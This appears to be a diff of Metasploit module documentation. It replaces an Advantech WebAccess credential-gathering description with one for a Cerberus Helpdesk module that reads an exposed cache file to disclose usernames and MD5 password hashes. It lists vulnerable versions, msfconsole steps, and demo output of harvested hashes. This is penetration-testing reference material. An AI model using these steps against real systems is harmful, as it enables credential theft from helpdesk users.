|
1 | 1 | ## Description |
2 | 2 |
|
3 | | -This module exploits three vulnerabilities in Advantech WebAccess. |
| 3 | +This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a |
| 4 | +data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not. |
4 | 5 |
|
5 | | -The first vulnerability is the ability for an arbitrary user to access the admin user list page, |
6 | | -revealing the username of every user on the system. |
7 | | - |
8 | | -The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with |
9 | | -the data of an arbitrary user. |
10 | | - |
11 | | -The final vulnerability exploited is that the HTML Form on the user edit page contains the user's |
12 | | -plain text password in the masked password input box. Typically the system should replace the |
13 | | -actual password with a masked character such as "*". |
| 6 | +## Vulnerable Application |
14 | 7 |
|
| 8 | +This module has been verified against: |
15 | 9 |
|
16 | | -## Vulnerable Application |
| 10 | +1. Version 4.2.3 Stable (Build 925) |
| 11 | +2. Version 5.4.4 |
17 | 12 |
|
18 | | -Version 8.1 was tested during development: |
| 13 | +However it may also work up to, but no including, version 6.7 |
19 | 14 |
|
20 | | -http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe |
| 15 | +Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip) |
21 | 16 |
|
22 | | -8.2 is not vulnerable to this. |
| 17 | +* of note, 5.4.4 has to be installed on a PRE php7 environment. |
23 | 18 |
|
24 | 19 | ## Verification Steps |
25 | 20 |
|
26 | 21 | 1. Start msfconsole |
27 | | -2. ```use auxiliary/gahter/advantech_webaccess_creds``` |
28 | | -3. ```set WEBACCESSUSER [USER]``` |
29 | | -4. ```set WEBACCESSPASS [PASS]``` |
30 | | -5. ```run``` |
31 | | - |
32 | | -## Options |
33 | | - |
34 | | -**WEBACCESSUSER** |
35 | | - |
36 | | -The username to use to log into Advantech WebAccess. By default, there is a built-in account |
37 | | -```admin``` that you could use. |
38 | | - |
39 | | -**WEBACCESSPASS** |
40 | | - |
41 | | -The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin``` |
42 | | -does not have a password, which could be something you can use. |
43 | | - |
| 22 | +2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure``` |
| 23 | +3. ```set rhosts``` |
| 24 | +4. ```run``` |
44 | 25 |
|
45 | 26 | ## Demo |
46 | 27 |
|
47 | | -msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure |
48 | | -msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options |
49 | | - |
50 | | -Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure): |
51 | | - |
52 | | - Name Current Setting Required Description |
53 | | - ---- --------------- -------- ----------- |
54 | | - Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
55 | | - RHOSTS yes The target address range or CIDR identifier |
56 | | - RPORT 80 yes The target port (TCP) |
57 | | - SSL false no Negotiate SSL/TLS for outgoing connections |
58 | | - THREADS 1 yes The number of concurrent threads |
59 | | - URI / no URL of the Cerberus Helpdesk root |
60 | | - VHOST no HTTP server virtual host |
61 | | - |
62 | | -msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 10.90.5.81 |
63 | | -rhosts => 10.90.5.81 |
64 | | -msf auxiliary(cerberus_helpdesk_hash_disclosure) > run |
65 | | - |
66 | | -[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers |
67 | | -[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b |
68 | | -[+] example:112302c209fe8d73f502c132a3da2b1c |
69 | | -[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7 |
| 28 | +### 4.2.3 using zend (not verbose) |
| 29 | + |
| 30 | + ``` |
| 31 | + msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure |
| 32 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1 |
| 33 | + rhosts => 1.1.1.1 |
| 34 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > run |
| 35 | + |
| 36 | + [-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers |
| 37 | + [+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b |
| 38 | + [+] example:112302c209fe8d73f502c132a3da2b1c |
| 39 | + [+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7 |
| 40 | + ``` |
| 41 | + |
| 42 | +### 5.4.4 using devblocks |
| 43 | + |
| 44 | + ``` |
| 45 | + msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure |
| 46 | + rhost => 192.168.2.45 |
| 47 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45 |
| 48 | + rhosts => 192.168.2.45 |
| 49 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > set uri /cerb5/ |
| 50 | + uri => /cerb5/ |
| 51 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true |
| 52 | + verbose => true |
| 53 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > run |
| 54 | + |
| 55 | + [*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers |
| 56 | + [+] [email protected]:37b51d194a7513e45b56f6524f2d51f2 |
| 57 | + [+] [email protected]:acbd18db4cc2f85cedef654fccc4a4d8 |
| 58 | + [+] [email protected]:18126e7bd3f84b3f3e4df094def5b7de |
| 59 | + [*] Scanned 1 of 1 hosts (100% complete) |
| 60 | + [*] Auxiliary module execution completed |
| 61 | + ``` |
0 commit comments